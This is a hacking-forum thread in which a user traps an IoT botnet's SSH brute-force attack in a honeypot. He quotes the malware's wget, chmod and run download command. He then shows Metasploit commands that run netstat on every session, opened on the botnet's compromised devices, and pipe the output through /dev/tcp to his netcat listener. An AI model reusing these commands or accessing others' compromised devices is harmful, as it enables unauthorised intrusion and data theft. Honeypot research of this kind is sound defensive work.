Jump to content

My network was brute forced... I let them in lol


i8igmac
 Share

Recommended Posts

Today i noticed my network was a little sluggish, so I checked the tcp stream out of habit. I see login attempts on my home router via ssh.

 

So I quickly installed in virtual-box a light version of ubuntu and then I installed a honeypot. I created a user list of root:x:500-worst-passwords for ssh

 

With some iptable kungfu I directed the attack to the honeypot and boom I see command execution while its happening

; -)

This is exciting...

 

The attack was coming from hundreds of LoT devices(webcams/routers/house hold applances)

 

When I seen the commands executed, I see wget http:/Attack-ip-address/y808oe chmod +x y808oe ./y808oe

 

So I download a copy of the file for later research in hopes that it might be 0day...

 

One of my thoughts is the list of lot devices used, I too could could gain access to these devices.

 

I believe this is just a LoT device worm automated to get more devices. 

 

Any one have experience or fun with honey pots?

Edited by i8igmac
  • Upvote 1
Link to comment
Share on other sites

57 minutes ago, Dave-ee Jones said:

So you used their hack to hack your own devices to gain better control of your own devices?

That's when you know you were never in control of your own devices..Sad boi.

No. That was my mistake with the iptable rules. When I attempt to log into the attackers ssh, it was my iptables rules would also forward me back to the vm... oops...

 

None of my devices was hacked. I setup a honeypot and gave direct acces in hopes to find some private exploits.

Edited by i8igmac
Link to comment
Share on other sites

Be careful if/when they root the VM box and spread to your real network. When doing this, I'd be running the VM from a throw away box as well, and the rest of your devices offline when the honeypot is on the network. If they escape the VM, they could possibly harm the host machine, and the rest of the network.

  • Upvote 1
Link to comment
Share on other sites

12 minutes ago, digip said:

Be careful if/when they root the VM box and spread to your real network. When doing this, I'd be running the VM from a throw away box as well, and the rest of your devices offline when the honeypot is on the network. If they escape the VM, they could possibly harm the host machine, and the rest of the network.

Yea. Keep the VM's networking off and turn VirtualBox's network capabilities off for that VM, otherwise, as Digip said, there will be issues..

Link to comment
Share on other sites

8 minutes ago, i8igmac said:

I'm not so worried, it looks like the rootkit creates a reverse proxy, the honey pot fails to execute The rootkit as per design.

 

 

Yeah, well, you won't mind if we say "we told you so" if you're whole network gets crypto'd or all your data is deleted or sent online then will you? :P

  • Upvote 1
Link to comment
Share on other sites

11 minutes ago, Dave-ee Jones said:

Yeah, well, you won't mind if we say "we told you so" if you're whole network gets crypto'd or all your data is deleted or sent online then will you? :P

Not worried, if you would like a shot just ask. my router is a beast custom build. Ill make this pot  a permanent setup.

Edited by i8igmac
Link to comment
Share on other sites

18 hours ago, i8igmac said:

Not worried, if you would like a shot just ask. my router is a beast custom build. Ill make this pot  a permanent setup.

I'm actually trying to flash a RP-WD03 with OpenWRT :/ Having numerous problems - mainly I can't get it to talk to my TFTP server and request a kernel..

Link to comment
Share on other sites

1 hour ago, Spoonish said:

Wireshark?

I do most of everything from a command line... since my router runs Ubuntu, there is no shortage of tools.

 

Tcpick is a command line tool that uses the same filtering as wire shark.

 

tcpick -I wlp3s0 -C

This simply shows each tcp connection made as it happens. then I ran the command below to see port 22 traffic with binary data.

 

Tcpick -i wlp3s0 -yP -C 'dst port 22'

 

I wish i had recorded the hole process.

Edited by i8igmac
Link to comment
Share on other sites

On 7/31/2017 at 6:01 AM, i8igmac said:

No. That was my mistake with the iptable rules. When I attempt to log into the attackers ssh, it was my iptables rules would also forward me back to the vm... oops...

 

None of my devices was hacked. I setup a honeypot and gave direct acces in hopes to find some private exploits.

Hello guys,how can I help???

Link to comment
Share on other sites

  • 2 months later...
On 8/5/2017 at 7:03 AM, Spoonish said:

Roy is here to save the day!♪♫

You could help in providing mind bottling theories to solving this question... how do you get shells...

 

 

The honey pot was fun but here was my next steps I took to exploring this botnet that is attacking my Super-L33t-wifi-router

 

There have been questions around here about seting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public ip... I have answered in this video.

 

If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video.

  • Like 3
Link to comment
Share on other sites

I found the CnC... all of these devices are connected to the same identicle ip...

 

Its a vpn service... so I guess all that is left to do is contact the vpn service and submit the logs...

 

 

turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done

first i started a listiner that greps for a specific ip...

then i sent 2 commands off to all current sessions

msf auxiliary(ssh_login) > sessions all  -c 'netstat -nt > net'

msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888

 

then the results pour into my netcat listener

turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
tcp        0      0 192.168.1.130:42074     217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.1.130:44592     217.23.5.33:443         CLOSE_WAIT  
tcp        0      0 192.168.10.101:40764    217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.10.102:47652    217.23.5.33:443         CLOSE_WAIT  
tcp        0      0 192.168.1.4:55475       217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.1.4:39033       217.23.5.33:443         CLOSE_WAIT  
tcp        0      0 192.168.1.103:47597     217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.1.103:56610     217.23.5.33:443         CLOSE_WAIT

 

i could turn this into a metasploit module or resource script.

Edited by i8igmac
Link to comment
Share on other sites

On 10/27/2017 at 9:02 AM, kdodge said:

on some *nix you can run netstat with the -p option to get the Process that is creating the connection. That might get you the backdoor that he is using.


netstat -ntp

 

yah its random generated application name.

217.23.5.33:443 ESTABLISHED agy46jk87

Link to comment
Share on other sites

  • 3 months later...
  • 1 month later...

I've been receiving random tcp traffic from unknown ips. I'm not sure if I should be worried or not. I'm nowhere near a pro at network security but I'm learning everyday. Should I try to protect myself? I hardly browse internet an never attack anyone. So I'm confused on how I'm getting random tcp connections.

Link to comment
Share on other sites

14 hours ago, Dave-ee Jones said:

Is 217.23.5.33 the actual IP? If so, it probably means the hacker bought a server off of Worldstream (owner of IP) and is using it to hack your network.

Yah. I email the admin. They respond appropriately asking for detailed information of the attack. but I decided I want to keep my honey pot running hoping to capture private exploits and log as many ip's as possible. The list is big. All easily exploitable 

Edited by i8igmac
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...